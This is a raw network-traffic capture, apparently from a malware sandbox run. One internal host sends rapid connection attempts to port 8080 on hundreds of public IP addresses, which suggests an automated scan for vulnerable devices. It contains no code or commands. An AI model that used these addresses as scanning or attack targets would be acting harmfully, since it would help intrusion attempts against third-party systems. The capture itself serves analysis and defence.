                                                            Feb 14, 2024 09:27:43.515749931 CET406848080192.168.2.2394.51.253.221
                                                            Feb 14, 2024 09:27:43.515749931 CET406848080192.168.2.2385.151.114.0
                                                            Feb 14, 2024 09:27:43.515749931 CET406848080192.168.2.2395.56.235.51
                                                            Feb 14, 2024 09:27:43.515764952 CET406848080192.168.2.2395.218.141.227
                                                            Feb 14, 2024 09:27:43.515774012 CET406848080192.168.2.2394.228.178.156
                                                            Feb 14, 2024 09:27:43.515777111 CET406848080192.168.2.2394.169.165.178
                                                            Feb 14, 2024 09:27:43.515785933 CET406848080192.168.2.2385.0.27.90
                                                            Feb 14, 2024 09:27:43.515785933 CET406848080192.168.2.2385.184.36.117
                                                            Feb 14, 2024 09:27:43.515788078 CET406848080192.168.2.2331.173.163.61
                                                            Feb 14, 2024 09:27:43.515801907 CET406848080192.168.2.2362.134.215.249
                                                            Feb 14, 2024 09:27:43.515816927 CET406848080192.168.2.2385.54.57.240
                                                            Feb 14, 2024 09:27:43.515820026 CET406848080192.168.2.2385.56.203.163
                                                            Feb 14, 2024 09:27:43.515825033 CET406848080192.168.2.2385.34.50.213
                                                            Feb 14, 2024 09:27:43.515834093 CET406848080192.168.2.2385.28.65.114
                                                            Feb 14, 2024 09:27:43.515836954 CET406848080192.168.2.2395.60.53.19
                                                            Feb 14, 2024 09:27:43.515839100 CET406848080192.168.2.2385.21.250.71
                                                            Feb 14, 2024 09:27:43.515839100 CET406848080192.168.2.2394.94.235.175
                                                            Feb 14, 2024 09:27:43.515844107 CET406848080192.168.2.2331.55.218.102
                                                            Feb 14, 2024 09:27:43.515844107 CET406848080192.168.2.2362.131.8.20
                                                            Feb 14, 2024 09:27:43.515846968 CET406848080192.168.2.2394.51.254.228
                                                            Feb 14, 2024 09:27:43.515849113 CET406848080192.168.2.2362.111.54.68
                                                            Feb 14, 2024 09:27:43.515855074 CET406848080192.168.2.2331.67.110.23
                                                            Feb 14, 2024 09:27:43.515855074 CET406848080192.168.2.2331.218.119.126
                                                            Feb 14, 2024 09:27:43.515856981 CET406848080192.168.2.2362.114.62.244
                                                            Feb 14, 2024 09:27:43.515860081 CET406848080192.168.2.2385.64.200.8
                                                            Feb 14, 2024 09:27:43.515877962 CET406848080192.168.2.2394.34.214.221
                                                            Feb 14, 2024 09:27:43.515880108 CET406848080192.168.2.2362.164.79.207
                                                            Feb 14, 2024 09:27:43.515892982 CET406848080192.168.2.2395.107.87.62
                                                            Feb 14, 2024 09:27:43.515892982 CET406848080192.168.2.2394.249.176.112
                                                            Feb 14, 2024 09:27:43.515897036 CET406848080192.168.2.2331.95.20.229
                                                            Feb 14, 2024 09:27:43.515901089 CET406848080192.168.2.2331.28.56.252
                                                            Feb 14, 2024 09:27:43.515911102 CET406848080192.168.2.2395.102.103.35
                                                            Feb 14, 2024 09:27:43.515927076 CET406848080192.168.2.2331.245.232.158
                                                            Feb 14, 2024 09:27:43.515930891 CET406848080192.168.2.2394.95.41.146
                                                            Feb 14, 2024 09:27:43.515934944 CET406848080192.168.2.2395.8.39.163
                                                            Feb 14, 2024 09:27:43.515942097 CET406848080192.168.2.2385.98.242.60
                                                            Feb 14, 2024 09:27:43.515945911 CET406848080192.168.2.2331.224.48.106
                                                            Feb 14, 2024 09:27:43.515958071 CET406848080192.168.2.2331.108.223.64
                                                            Feb 14, 2024 09:27:43.515958071 CET406848080192.168.2.2362.50.205.162
                                                            Feb 14, 2024 09:27:43.515964985 CET406848080192.168.2.2395.8.185.190
                                                            Feb 14, 2024 09:27:43.515975952 CET406848080192.168.2.2362.127.249.89
                                                            Feb 14, 2024 09:27:43.515980959 CET406848080192.168.2.2395.164.110.4
                                                            Feb 14, 2024 09:27:43.515989065 CET406848080192.168.2.2385.42.156.158
                                                            Feb 14, 2024 09:27:43.515993118 CET406848080192.168.2.2395.36.220.252
                                                            Feb 14, 2024 09:27:43.516015053 CET406848080192.168.2.2331.88.208.108
                                                            Feb 14, 2024 09:27:43.516015053 CET406848080192.168.2.2331.166.211.111
                                                            Feb 14, 2024 09:27:43.516015053 CET406848080192.168.2.2331.69.58.204
                                                            Feb 14, 2024 09:27:43.516036987 CET406848080192.168.2.2362.216.227.130
                                                            Feb 14, 2024 09:27:43.516037941 CET406848080192.168.2.2394.76.95.98
                                                            Feb 14, 2024 09:27:43.516040087 CET406848080192.168.2.2385.45.141.168
                                                            Feb 14, 2024 09:27:43.516045094 CET406848080192.168.2.2331.208.21.184
                                                            Feb 14, 2024 09:27:43.516046047 CET406848080192.168.2.2394.145.155.22
                                                            Feb 14, 2024 09:27:43.516052961 CET80805365294.120.18.189192.168.2.23
                                                            Feb 14, 2024 09:27:43.516061068 CET406848080192.168.2.2331.202.161.214
                                                            Feb 14, 2024 09:27:43.516067028 CET406848080192.168.2.2385.252.59.110
                                                            Feb 14, 2024 09:27:43.516098976 CET406848080192.168.2.2362.54.18.121
                                                            Feb 14, 2024 09:27:43.516098976 CET406848080192.168.2.2362.172.125.100
                                                            Feb 14, 2024 09:27:43.516100883 CET406848080192.168.2.2395.65.200.251
                                                            Feb 14, 2024 09:27:43.516103983 CET406848080192.168.2.2395.90.117.58
                                                            Feb 14, 2024 09:27:43.516107082 CET406848080192.168.2.2331.171.242.25
                                                            Feb 14, 2024 09:27:43.516113043 CET406848080192.168.2.2395.67.53.86
                                                            Feb 14, 2024 09:27:43.516124010 CET406848080192.168.2.2394.50.115.242
                                                            Feb 14, 2024 09:27:43.516124010 CET406848080192.168.2.2385.178.21.7
                                                            Feb 14, 2024 09:27:43.516134024 CET406848080192.168.2.2331.170.204.60
                                                            Feb 14, 2024 09:27:43.516153097 CET406848080192.168.2.2331.147.140.242
                                                            Feb 14, 2024 09:27:43.516159058 CET406848080192.168.2.2394.70.35.77
                                                            Feb 14, 2024 09:27:43.516159058 CET406848080192.168.2.2331.213.116.139
                                                            Feb 14, 2024 09:27:43.516160965 CET406848080192.168.2.2395.30.152.107
                                                            Feb 14, 2024 09:27:43.516160965 CET406848080192.168.2.2362.24.110.29
                                                            Feb 14, 2024 09:27:43.516169071 CET406848080192.168.2.2362.228.75.158
                                                            Feb 14, 2024 09:27:43.516182899 CET406848080192.168.2.2385.196.126.180
                                                            Feb 14, 2024 09:27:43.516182899 CET406848080192.168.2.2394.33.252.23
                                                            Feb 14, 2024 09:27:43.516186953 CET406848080192.168.2.2394.42.149.182
                                                            Feb 14, 2024 09:27:43.516210079 CET406848080192.168.2.2395.202.111.142
                                                            Feb 14, 2024 09:27:43.516213894 CET406848080192.168.2.2362.222.15.84
                                                            Feb 14, 2024 09:27:43.516220093 CET406848080192.168.2.2385.125.236.201
                                                            Feb 14, 2024 09:27:43.516221046 CET406848080192.168.2.2394.100.233.191
                                                            Feb 14, 2024 09:27:43.516222954 CET406848080192.168.2.2362.78.91.69
                                                            Feb 14, 2024 09:27:43.516222954 CET406848080192.168.2.2394.197.83.0
                                                            Feb 14, 2024 09:27:43.516227007 CET406848080192.168.2.2362.126.222.109
                                                            Feb 14, 2024 09:27:43.516242981 CET406848080192.168.2.2385.194.142.70
                                                            Feb 14, 2024 09:27:43.516249895 CET406848080192.168.2.2362.24.126.125
                                                            Feb 14, 2024 09:27:43.516251087 CET406848080192.168.2.2395.113.9.101
                                                            Feb 14, 2024 09:27:43.516253948 CET406848080192.168.2.2395.137.121.244
                                                            Feb 14, 2024 09:27:43.516273022 CET406848080192.168.2.2362.75.116.53
                                                            Feb 14, 2024 09:27:43.516275883 CET406848080192.168.2.2394.180.171.126
                                                            Feb 14, 2024 09:27:43.516283989 CET406848080192.168.2.2385.24.0.88
                                                            Feb 14, 2024 09:27:43.516288996 CET406848080192.168.2.2331.22.237.7
                                                            Feb 14, 2024 09:27:43.516300917 CET406848080192.168.2.2362.28.10.147
                                                            Feb 14, 2024 09:27:43.516300917 CET406848080192.168.2.2395.227.47.108
                                                            Feb 14, 2024 09:27:43.516302109 CET406848080192.168.2.2385.197.56.7
                                                            Feb 14, 2024 09:27:43.516309977 CET406848080192.168.2.2331.53.105.162
                                                            Feb 14, 2024 09:27:43.516328096 CET406848080192.168.2.2362.154.248.45
                                                            Feb 14, 2024 09:27:43.516328096 CET406848080192.168.2.2362.17.156.113
                                                            Feb 14, 2024 09:27:43.516329050 CET406848080192.168.2.2331.94.144.255
                                                            Feb 14, 2024 09:27:43.516333103 CET406848080192.168.2.2362.86.18.155
                                                            Feb 14, 2024 09:27:43.516333103 CET406848080192.168.2.2394.64.192.223
                                                            Feb 14, 2024 09:27:43.516343117 CET406848080192.168.2.2394.75.242.48
                                                            Feb 14, 2024 09:27:43.516347885 CET406848080192.168.2.2394.173.249.222
                                                            Feb 14, 2024 09:27:43.516361952 CET406848080192.168.2.2385.64.161.2
                                                            Feb 14, 2024 09:27:43.516369104 CET406848080192.168.2.2395.35.162.235
                                                            Feb 14, 2024 09:27:43.516371012 CET406848080192.168.2.2362.38.62.182
                                                            Feb 14, 2024 09:27:43.516385078 CET406848080192.168.2.2395.9.26.29
                                                            Feb 14, 2024 09:27:43.516385078 CET406848080192.168.2.2331.241.16.19
                                                            Feb 14, 2024 09:27:43.516385078 CET406848080192.168.2.2331.141.37.234
                                                            Feb 14, 2024 09:27:43.516396999 CET406848080192.168.2.2385.115.102.50
                                                            Feb 14, 2024 09:27:43.516406059 CET406848080192.168.2.2362.89.222.199
                                                            Feb 14, 2024 09:27:43.516406059 CET406848080192.168.2.2395.146.137.234
                                                            Feb 14, 2024 09:27:43.516410112 CET406848080192.168.2.2331.174.172.54
                                                            Feb 14, 2024 09:27:43.516417980 CET406848080192.168.2.2395.197.146.141
                                                            Feb 14, 2024 09:27:43.516444921 CET406848080192.168.2.2394.188.83.93
                                                            Feb 14, 2024 09:27:43.516446114 CET406848080192.168.2.2385.26.206.213
                                                            Feb 14, 2024 09:27:43.516448975 CET406848080192.168.2.2395.89.232.243
                                                            Feb 14, 2024 09:27:43.516450882 CET406848080192.168.2.2331.24.114.72
                                                            Feb 14, 2024 09:27:43.516453981 CET406848080192.168.2.2331.84.106.94
                                                            Feb 14, 2024 09:27:43.516453981 CET406848080192.168.2.2394.4.15.7
                                                            Feb 14, 2024 09:27:43.516464949 CET406848080192.168.2.2394.52.174.10
                                                            Feb 14, 2024 09:27:43.516464949 CET406848080192.168.2.2362.103.163.235
                                                            Feb 14, 2024 09:27:43.516483068 CET406848080192.168.2.2394.94.135.246
                                                            Feb 14, 2024 09:27:43.516488075 CET406848080192.168.2.2395.226.159.40
                                                            Feb 14, 2024 09:27:43.516489029 CET406848080192.168.2.2394.127.2.22
                                                            Feb 14, 2024 09:27:43.516489029 CET406848080192.168.2.2395.242.102.242
                                                            Feb 14, 2024 09:27:43.516490936 CET406848080192.168.2.2385.165.70.105
                                                            Feb 14, 2024 09:27:43.516503096 CET406848080192.168.2.2395.146.48.62
                                                            Feb 14, 2024 09:27:43.516515970 CET406848080192.168.2.2385.103.123.122
                                                            Feb 14, 2024 09:27:43.516525984 CET406848080192.168.2.2362.40.73.16
                                                            Feb 14, 2024 09:27:43.516525984 CET406848080192.168.2.2385.254.31.123
                                                            Feb 14, 2024 09:27:43.516542912 CET406848080192.168.2.2362.64.122.35
                                                            Feb 14, 2024 09:27:43.516551018 CET406848080192.168.2.2331.239.42.102
                                                            Feb 14, 2024 09:27:43.516551018 CET406848080192.168.2.2362.109.175.6
                                                            Feb 14, 2024 09:27:43.516552925 CET406848080192.168.2.2362.28.153.250
                                                            Feb 14, 2024 09:27:43.516567945 CET406848080192.168.2.2385.206.33.118
                                                            Feb 14, 2024 09:27:43.516570091 CET406848080192.168.2.2394.42.73.206
                                                            Feb 14, 2024 09:27:43.516571045 CET406848080192.168.2.2331.122.26.36
                                                            Feb 14, 2024 09:27:43.516571045 CET406848080192.168.2.2394.238.183.55
                                                            Feb 14, 2024 09:27:43.516583920 CET406848080192.168.2.2395.185.229.66
                                                            Feb 14, 2024 09:27:43.516594887 CET406848080192.168.2.2362.25.90.249
                                                            Feb 14, 2024 09:27:43.516594887 CET406848080192.168.2.2362.197.139.45
                                                            Feb 14, 2024 09:27:43.516611099 CET406848080192.168.2.2331.250.197.95
                                                            Feb 14, 2024 09:27:43.516611099 CET406848080192.168.2.2394.22.42.90
                                                            Feb 14, 2024 09:27:43.516613007 CET406848080192.168.2.2385.50.156.235
                                                            Feb 14, 2024 09:27:43.516612053 CET406848080192.168.2.2394.115.87.54
                                                            Feb 14, 2024 09:27:43.516612053 CET406848080192.168.2.2394.85.74.61
                                                            Feb 14, 2024 09:27:43.516633034 CET406848080192.168.2.2362.215.4.30
                                                            Feb 14, 2024 09:27:43.516642094 CET406848080192.168.2.2331.179.34.23
                                                            Feb 14, 2024 09:27:43.516642094 CET406848080192.168.2.2385.57.214.179
                                                            Feb 14, 2024 09:27:43.516645908 CET406848080192.168.2.2395.126.230.0
                                                            Feb 14, 2024 09:27:43.516649961 CET406848080192.168.2.2385.175.120.190
                                                            Feb 14, 2024 09:27:43.516671896 CET406848080192.168.2.2385.57.198.173
                                                            Feb 14, 2024 09:27:43.516673088 CET406848080192.168.2.2362.124.135.36
                                                            Feb 14, 2024 09:27:43.516674042 CET406848080192.168.2.2362.54.77.120
                                                            Feb 14, 2024 09:27:43.516675949 CET406848080192.168.2.2385.26.149.9
                                                            Feb 14, 2024 09:27:43.516678095 CET406848080192.168.2.2394.162.36.168
                                                            Feb 14, 2024 09:27:43.516690016 CET406848080192.168.2.2394.157.235.10
                                                            Feb 14, 2024 09:27:43.516694069 CET406848080192.168.2.2394.201.85.217
                                                            Feb 14, 2024 09:27:43.516695976 CET406848080192.168.2.2395.161.34.93
                                                            Feb 14, 2024 09:27:43.516722918 CET406848080192.168.2.2362.233.19.19
                                                            Feb 14, 2024 09:27:43.516722918 CET406848080192.168.2.2385.114.21.220
                                                            Feb 14, 2024 09:27:43.516726971 CET406848080192.168.2.2385.231.33.75
                                                            Feb 14, 2024 09:27:43.516727924 CET406848080192.168.2.2394.131.133.70
                                                            Feb 14, 2024 09:27:43.516730070 CET406848080192.168.2.2395.122.193.66
                                                            Feb 14, 2024 09:27:43.516752958 CET406848080192.168.2.2394.82.25.72
                                                            Feb 14, 2024 09:27:43.516752958 CET406848080192.168.2.2385.66.48.193
                                                            Feb 14, 2024 09:27:43.516753912 CET406848080192.168.2.2385.63.96.215
                                                            Feb 14, 2024 09:27:43.516753912 CET406848080192.168.2.2362.247.44.184
                                                            Feb 14, 2024 09:27:43.516762018 CET406848080192.168.2.2362.116.192.162
                                                            Feb 14, 2024 09:27:43.516774893 CET406848080192.168.2.2331.235.123.128
                                                            Feb 14, 2024 09:27:43.516777039 CET406848080192.168.2.2394.201.177.67
                                                            Feb 14, 2024 09:27:43.516782045 CET406848080192.168.2.2385.156.243.238
                                                            Feb 14, 2024 09:27:43.516788960 CET406848080192.168.2.2385.2.107.81
                                                            Feb 14, 2024 09:27:43.516798973 CET406848080192.168.2.2331.210.131.125
                                                            Feb 14, 2024 09:27:43.516804934 CET406848080192.168.2.2362.118.88.240
                                                            Feb 14, 2024 09:27:43.516804934 CET406848080192.168.2.2394.99.117.251
                                                            Feb 14, 2024 09:27:43.516808987 CET406848080192.168.2.2362.25.76.67
                                                            Feb 14, 2024 09:27:43.516818047 CET406848080192.168.2.2362.129.151.226
                                                            Feb 14, 2024 09:27:43.516824961 CET406848080192.168.2.2395.62.6.216
                                                            Feb 14, 2024 09:27:43.516825914 CET406848080192.168.2.2395.213.65.231
                                                            Feb 14, 2024 09:27:43.516825914 CET406848080192.168.2.2385.2.176.89
                                                            Feb 14, 2024 09:27:43.516839981 CET406848080192.168.2.2385.6.171.227
                                                            Feb 14, 2024 09:27:43.516840935 CET406848080192.168.2.2331.77.15.187
                                                            Feb 14, 2024 09:27:43.516854048 CET406848080192.168.2.2385.46.66.46
                                                            Feb 14, 2024 09:27:43.516864061 CET406848080192.168.2.2394.54.48.240
                                                            Feb 14, 2024 09:27:43.516870022 CET406848080192.168.2.2331.54.206.127
                                                            Feb 14, 2024 09:27:43.516871929 CET406848080192.168.2.2331.181.97.31
                                                            Feb 14, 2024 09:27:43.516871929 CET406848080192.168.2.2362.11.109.107
                                                            Feb 14, 2024 09:27:43.516875982 CET406848080192.168.2.2362.16.234.227
                                                            Feb 14, 2024 09:27:43.516895056 CET406848080192.168.2.2362.101.89.155
                                                            Feb 14, 2024 09:27:43.516895056 CET406848080192.168.2.2331.235.195.11
                                                            Feb 14, 2024 09:27:43.516897917 CET406848080192.168.2.2362.85.44.5
                                                            Feb 14, 2024 09:27:43.516927004 CET406848080192.168.2.2395.166.15.7
                                                            Feb 14, 2024 09:27:43.516927958 CET406848080192.168.2.2394.223.71.105
                                                            Feb 14, 2024 09:27:43.516932964 CET406848080192.168.2.2331.31.237.226
                                                            Feb 14, 2024 09:27:43.516932964 CET406848080192.168.2.2362.124.205.63
                                                            Feb 14, 2024 09:27:43.516932964 CET406848080192.168.2.2395.48.172.242
                                                            Feb 14, 2024 09:27:43.516937971 CET406848080192.168.2.2331.120.189.124
                                                            Feb 14, 2024 09:27:43.516946077 CET406848080192.168.2.2395.244.58.204
                                                            Feb 14, 2024 09:27:43.516946077 CET406848080192.168.2.2362.34.21.31
                                                            Feb 14, 2024 09:27:43.516957998 CET406848080192.168.2.2362.217.193.40
                                                            Feb 14, 2024 09:27:43.516958952 CET406848080192.168.2.2385.145.94.238
                                                            Feb 14, 2024 09:27:43.516962051 CET406848080192.168.2.2362.183.175.109
                                                            Feb 14, 2024 09:27:43.516968012 CET406848080192.168.2.2362.199.134.4
                                                            Feb 14, 2024 09:27:43.516977072 CET406848080192.168.2.2395.192.178.145
                                                            Feb 14, 2024 09:27:43.516977072 CET406848080192.168.2.2394.171.149.96
                                                            Feb 14, 2024 09:27:43.516984940 CET406848080192.168.2.2385.7.26.105
                                                            Feb 14, 2024 09:27:43.516999006 CET406848080192.168.2.2362.152.78.246
                                                            Feb 14, 2024 09:27:43.516999960 CET406848080192.168.2.2362.247.69.196
                                                            Feb 14, 2024 09:27:43.517005920 CET406848080192.168.2.2362.118.244.171
                                                            Feb 14, 2024 09:27:43.517005920 CET406848080192.168.2.2394.104.61.44
                                                            Feb 14, 2024 09:27:43.517016888 CET406848080192.168.2.2331.51.148.93
                                                            Feb 14, 2024 09:27:43.517026901 CET406848080192.168.2.2362.212.29.106
                                                            Feb 14, 2024 09:27:43.517030954 CET406848080192.168.2.2394.199.9.193
                                                            Feb 14, 2024 09:27:43.517031908 CET406848080192.168.2.2395.151.243.40
                                                            Feb 14, 2024 09:27:43.517046928 CET406848080192.168.2.2331.53.52.7
                                                            Feb 14, 2024 09:27:43.517047882 CET406848080192.168.2.2394.11.106.88
                                                            Feb 14, 2024 09:27:43.517047882 CET406848080192.168.2.2385.149.62.13
                                                            Feb 14, 2024 09:27:43.517059088 CET406848080192.168.2.2394.238.203.181
                                                            Feb 14, 2024 09:27:43.517066956 CET406848080192.168.2.2395.119.214.52
                                                            Feb 14, 2024 09:27:43.517066956 CET406848080192.168.2.2331.183.155.78
                                                            Feb 14, 2024 09:27:43.517079115 CET406848080192.168.2.2395.11.42.8
                                                            Feb 14, 2024 09:27:43.517083883 CET406848080192.168.2.2395.229.239.151
                                                            Feb 14, 2024 09:27:43.517092943 CET406848080192.168.2.2362.76.93.23
                                                            Feb 14, 2024 09:27:43.517096043 CET406848080192.168.2.2362.208.212.144
                                                            Feb 14, 2024 09:27:43.517112970 CET406848080192.168.2.2362.37.50.133
                                                            Feb 14, 2024 09:27:43.517113924 CET406848080192.168.2.2362.150.101.198
                                                            Feb 14, 2024 09:27:43.517117023 CET406848080192.168.2.2362.75.194.196
                                                            Feb 14, 2024 09:27:43.517118931 CET406848080192.168.2.2395.125.217.46
                                                            Feb 14, 2024 09:27:43.517132044 CET406848080192.168.2.2394.178.143.203
                                                            Feb 14, 2024 09:27:43.517146111 CET406848080192.168.2.2385.137.174.24
                                                            Feb 14, 2024 09:27:43.517147064 CET406848080192.168.2.2385.20.72.208
                                                            Feb 14, 2024 09:27:43.517147064 CET406848080192.168.2.2362.67.214.190
                                                            Feb 14, 2024 09:27:43.517163038 CET406848080192.168.2.2331.82.20.82
                                                            Feb 14, 2024 09:27:43.517165899 CET406848080192.168.2.2362.147.171.51
                                                            Feb 14, 2024 09:27:43.517183065 CET406848080192.168.2.2395.205.99.160
                                                            Feb 14, 2024 09:27:43.517183065 CET406848080192.168.2.2385.32.69.61
                                                            Feb 14, 2024 09:27:43.517184019 CET406848080192.168.2.2331.177.151.119
                                                            Feb 14, 2024 09:27:43.517184019 CET406848080192.168.2.2394.141.64.5
                                                            Feb 14, 2024 09:27:43.517189026 CET406848080192.168.2.2395.212.251.56
                                                            Feb 14, 2024 09:27:43.517189980 CET406848080192.168.2.2394.176.251.183
                                                            Feb 14, 2024 09:27:43.517199993 CET406848080192.168.2.2394.84.179.248
                                                            Feb 14, 2024 09:27:43.517225027 CET406848080192.168.2.2394.228.98.134
                                                            Feb 14, 2024 09:27:43.517224073 CET406848080192.168.2.2331.152.107.197
                                                            Feb 14, 2024 09:27:43.517225027 CET406848080192.168.2.2395.247.127.157
                                                            Feb 14, 2024 09:27:43.517229080 CET406848080192.168.2.2331.165.142.246
                                                            Feb 14, 2024 09:27:43.517239094 CET406848080192.168.2.2395.153.190.11
                                                            Feb 14, 2024 09:27:43.517244101 CET406848080192.168.2.2331.238.156.98
                                                            Feb 14, 2024 09:27:43.517251015 CET406848080192.168.2.2385.25.49.76
                                                            Feb 14, 2024 09:27:43.517250061 CET406848080192.168.2.2394.160.67.100
                                                            Feb 14, 2024 09:27:43.517261028 CET406848080192.168.2.2395.166.197.202
                                                            Feb 14, 2024 09:27:43.517266989 CET406848080192.168.2.2331.228.201.199
                                                            Feb 14, 2024 09:27:43.517268896 CET406848080192.168.2.2394.69.243.88
                                                            Feb 14, 2024 09:27:43.517285109 CET406848080192.168.2.2395.189.153.128
                                                            Feb 14, 2024 09:27:43.517296076 CET406848080192.168.2.2362.181.131.242
                                                            Feb 14, 2024 09:27:43.517296076 CET406848080192.168.2.2331.69.123.22
                                                            Feb 14, 2024 09:27:43.517297029 CET406848080192.168.2.2395.17.182.78
                                                            Feb 14, 2024 09:27:43.517296076 CET406848080192.168.2.2385.40.126.46
                                                            Feb 14, 2024 09:27:43.517306089 CET406848080192.168.2.2331.40.206.108
                                                            Feb 14, 2024 09:27:43.517306089 CET406848080192.168.2.2331.122.120.194
                                                            Feb 14, 2024 09:27:43.517309904 CET406848080192.168.2.2362.203.154.146
                                                            Feb 14, 2024 09:27:43.517316103 CET406848080192.168.2.2362.197.243.194
                                                            Feb 14, 2024 09:27:43.517330885 CET406848080192.168.2.2331.239.205.165
                                                            Feb 14, 2024 09:27:43.517330885 CET406848080192.168.2.2331.224.16.31
                                                            Feb 14, 2024 09:27:43.517330885 CET406848080192.168.2.2331.69.238.89
                                                            Feb 14, 2024 09:27:43.517345905 CET406848080192.168.2.2395.6.14.172
                                                            Feb 14, 2024 09:27:43.517350912 CET406848080192.168.2.2362.167.88.234
                                                            Feb 14, 2024 09:27:43.517353058 CET406848080192.168.2.2362.21.178.171
                                                            Feb 14, 2024 09:27:43.517365932 CET406848080192.168.2.2395.212.29.232
                                                            Feb 14, 2024 09:27:43.517374039 CET406848080192.168.2.2331.42.168.6
                                                            Feb 14, 2024 09:27:43.517376900 CET406848080192.168.2.2395.62.116.201
                                                            Feb 14, 2024 09:27:43.517383099 CET406848080192.168.2.2395.171.204.210
                                                            Feb 14, 2024 09:27:43.517390013 CET406848080192.168.2.2394.155.100.0
                                                            Feb 14, 2024 09:27:43.517400980 CET406848080192.168.2.2385.85.214.93
                                                            Feb 14, 2024 09:27:43.517406940 CET406848080192.168.2.2395.207.54.156
                                                            Feb 14, 2024 09:27:43.517424107 CET406848080192.168.2.2331.36.11.50
                                                            Feb 14, 2024 09:27:43.517429113 CET406848080192.168.2.2394.178.219.0
                                                            Feb 14, 2024 09:27:43.517429113 CET406848080192.168.2.2385.96.39.124
                                                            Feb 14, 2024 09:27:43.517429113 CET406848080192.168.2.2362.162.121.60
                                                            Feb 14, 2024 09:27:43.517437935 CET406848080192.168.2.2395.239.192.3
                                                            Feb 14, 2024 09:27:43.517437935 CET406848080192.168.2.2331.137.229.70
                                                            Feb 14, 2024 09:27:43.517445087 CET406848080192.168.2.2395.87.223.13
                                                            Feb 14, 2024 09:27:43.517457962 CET406848080192.168.2.2385.46.148.197
                                                            Feb 14, 2024 09:27:43.517457962 CET406848080192.168.2.2394.140.90.45
                                                            Feb 14, 2024 09:27:43.517467976 CET406848080192.168.2.2385.206.118.207
                                                            Feb 14, 2024 09:27:43.517471075 CET406848080192.168.2.2395.164.1.187
                                                            Feb 14, 2024 09:27:43.517482042 CET406848080192.168.2.2395.255.93.210
                                                            Feb 14, 2024 09:27:43.517484903 CET406848080192.168.2.2362.244.204.28
                                                            Feb 14, 2024 09:27:43.517484903 CET406848080192.168.2.2385.202.217.173
                                                            Feb 14, 2024 09:27:43.517497063 CET406848080192.168.2.2331.60.67.167
                                                            Feb 14, 2024 09:27:43.517504930 CET406848080192.168.2.2385.71.57.171
                                                            Feb 14, 2024 09:27:43.517507076 CET406848080192.168.2.2362.47.35.119
                                                            Feb 14, 2024 09:27:43.517518044 CET406848080192.168.2.2385.244.117.206
                                                            Feb 14, 2024 09:27:43.517519951 CET406848080192.168.2.2394.253.78.10
                                                            Feb 14, 2024 09:27:43.517520905 CET406848080192.168.2.2385.131.161.37
                                                            Feb 14, 2024 09:27:43.517520905 CET406848080192.168.2.2331.65.123.124
                                                            Feb 14, 2024 09:27:43.517534971 CET406848080192.168.2.2394.201.248.240
                                                            Feb 14, 2024 09:27:43.517540932 CET406848080192.168.2.2394.107.40.132
                                                            Feb 14, 2024 09:27:43.517540932 CET406848080192.168.2.2394.127.62.35
                                                            Feb 14, 2024 09:27:43.517543077 CET406848080192.168.2.2394.72.103.157
                                                            Feb 14, 2024 09:27:43.517549992 CET406848080192.168.2.2362.193.135.139
                                                            Feb 14, 2024 09:27:43.517551899 CET406848080192.168.2.2395.87.114.200
                                                            Feb 14, 2024 09:27:43.517569065 CET406848080192.168.2.2331.175.116.131
                                                            Feb 14, 2024 09:27:43.517574072 CET406848080192.168.2.2385.1.155.137
                                                            Feb 14, 2024 09:27:43.517575979 CET406848080192.168.2.2362.170.215.238
                                                            Feb 14, 2024 09:27:43.517575979 CET406848080192.168.2.2385.242.177.202
                                                            Feb 14, 2024 09:27:43.517587900 CET406848080192.168.2.2385.148.242.91
                                                            Feb 14, 2024 09:27:43.517589092 CET406848080192.168.2.2395.133.93.57
                                                            Feb 14, 2024 09:27:43.517608881 CET406848080192.168.2.2394.123.212.169
                                                            Feb 14, 2024 09:27:43.517608881 CET406848080192.168.2.2385.145.219.110
                                                            Feb 14, 2024 09:27:43.517608881 CET406848080192.168.2.2395.145.183.104
                                                            Feb 14, 2024 09:27:43.517616034 CET406848080192.168.2.2362.211.159.8
                                                            Feb 14, 2024 09:27:43.517616034 CET406848080192.168.2.2331.60.175.0
                                                            Feb 14, 2024 09:27:43.517616034 CET406848080192.168.2.2395.158.64.71
                                                            Feb 14, 2024 09:27:43.517625093 CET406848080192.168.2.2331.126.182.184
                                                            Feb 14, 2024 09:27:43.517625093 CET406848080192.168.2.2331.247.170.243
                                                            Feb 14, 2024 09:27:43.517625093 CET406848080192.168.2.2394.71.0.132
                                                            Feb 14, 2024 09:27:43.517657995 CET406848080192.168.2.2331.184.73.2
                                                            Feb 14, 2024 09:27:43.517659903 CET406848080192.168.2.2362.159.81.37
                                                            Feb 14, 2024 09:27:43.517659903 CET406848080192.168.2.2362.236.219.100
                                                            Feb 14, 2024 09:27:43.517659903 CET406848080192.168.2.2331.239.3.143
                                                            Feb 14, 2024 09:27:43.517682076 CET406848080192.168.2.2331.213.95.69
                                                            Feb 14, 2024 09:27:43.517683029 CET406848080192.168.2.2362.254.24.127
                                                            Feb 14, 2024 09:27:43.517683029 CET406848080192.168.2.2385.184.82.4
                                                            Feb 14, 2024 09:27:43.517687082 CET406848080192.168.2.2385.83.27.161
                                                            Feb 14, 2024 09:27:43.517695904 CET406848080192.168.2.2362.228.28.62
                                                            Feb 14, 2024 09:27:43.517703056 CET406848080192.168.2.2385.68.70.201
                                                            Feb 14, 2024 09:27:43.517704964 CET406848080192.168.2.2395.193.51.246
                                                            Feb 14, 2024 09:27:43.517719030 CET406848080192.168.2.2385.184.106.85
                                                            Feb 14, 2024 09:27:43.517719984 CET406848080192.168.2.2362.171.31.221
                                                            Feb 14, 2024 09:27:43.517729998 CET406848080192.168.2.2385.180.123.146
                                                            Feb 14, 2024 09:27:43.517733097 CET406848080192.168.2.2394.114.39.157
                                                            Feb 14, 2024 09:27:43.517745972 CET406848080192.168.2.2394.126.41.3
                                                            Feb 14, 2024 09:27:43.517749071 CET406848080192.168.2.2385.70.136.182
                                                            Feb 14, 2024 09:27:43.517749071 CET406848080192.168.2.2385.4.190.194
                                                            Feb 14, 2024 09:27:43.517760992 CET406848080192.168.2.2331.79.44.210
                                                            Feb 14, 2024 09:27:43.517761946 CET406848080192.168.2.2394.16.69.152
                                                            Feb 14, 2024 09:27:43.517765999 CET406848080192.168.2.2362.251.178.177
                                                            Feb 14, 2024 09:27:43.517774105 CET406848080192.168.2.2395.157.230.112
                                                            Feb 14, 2024 09:27:43.517780066 CET406848080192.168.2.2395.74.213.103
                                                            Feb 14, 2024 09:27:43.517780066 CET406848080192.168.2.2331.194.187.224
                                                            Feb 14, 2024 09:27:43.517791033 CET406848080192.168.2.2331.177.147.0
                                                            Feb 14, 2024 09:27:43.517802954 CET406848080192.168.2.2331.85.88.111
